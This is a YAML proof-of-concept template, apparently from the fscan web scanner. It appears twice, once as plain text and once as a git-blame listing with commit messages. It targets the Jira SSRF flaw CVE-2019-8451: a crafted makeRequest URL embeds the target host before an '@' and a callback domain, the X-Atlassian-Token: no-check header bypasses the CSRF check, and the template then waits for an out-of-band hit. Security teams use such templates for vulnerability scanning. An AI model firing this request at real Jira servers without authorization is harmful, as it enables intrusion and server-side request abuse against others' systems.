fscan/WebScan/pocs/jira-ssrf-cve-2019-8451.yml

name: poc-yaml-jira-ssrf-cve-2019-8451
set:
  reverse: newReverse()
  originScheme: request.url.scheme
  originHost: request.url.host
  reverseURL: reverse.domain
rules:
  - method: GET
    path: >-
      /plugins/servlet/gadgets/makeRequest?url={{originScheme}}://{{originHost}}@{{reverseURL}}
    headers:
      X-Atlassian-Token: no-check
    expression: |
      reverse.wait(5)
detail:
  author: jingling(https://github.com/shmilylty)
  links:
    - https://jira.atlassian.com/browse/JRASERVER-69793
优化xray解析模块,支持groups、新增poc 2021-11-16 11:53:46 +08:00			`name: poc-yaml-jira-ssrf-cve-2019-8451`
			`set:`
优化poc模块正则Set-Cookie时的结果 2023-05-05 18:08:13 +08:00			`reverse: newReverse()`
优化xray解析模块,支持groups、新增poc 2021-11-16 11:53:46 +08:00			`originScheme: request.url.scheme`
			`originHost: request.url.host`
update 2023-05-05 23:31:28 +08:00			`reverseURL: reverse.domain`
优化xray解析模块,支持groups、新增poc 2021-11-16 11:53:46 +08:00			`rules:`
			`- method: GET`
			`path: >-`
update 2023-05-05 23:31:28 +08:00			`/plugins/servlet/gadgets/makeRequest?url={{originScheme}}://{{originHost}}@{{reverseURL}}`
优化xray解析模块,支持groups、新增poc 2021-11-16 11:53:46 +08:00			`headers:`
			`X-Atlassian-Token: no-check`
			`expression: \|`
			`reverse.wait(5)`
			`detail:`
			`author: jingling(https://github.com/shmilylty)`
			`links:`
			`- https://jira.atlassian.com/browse/JRASERVER-69793`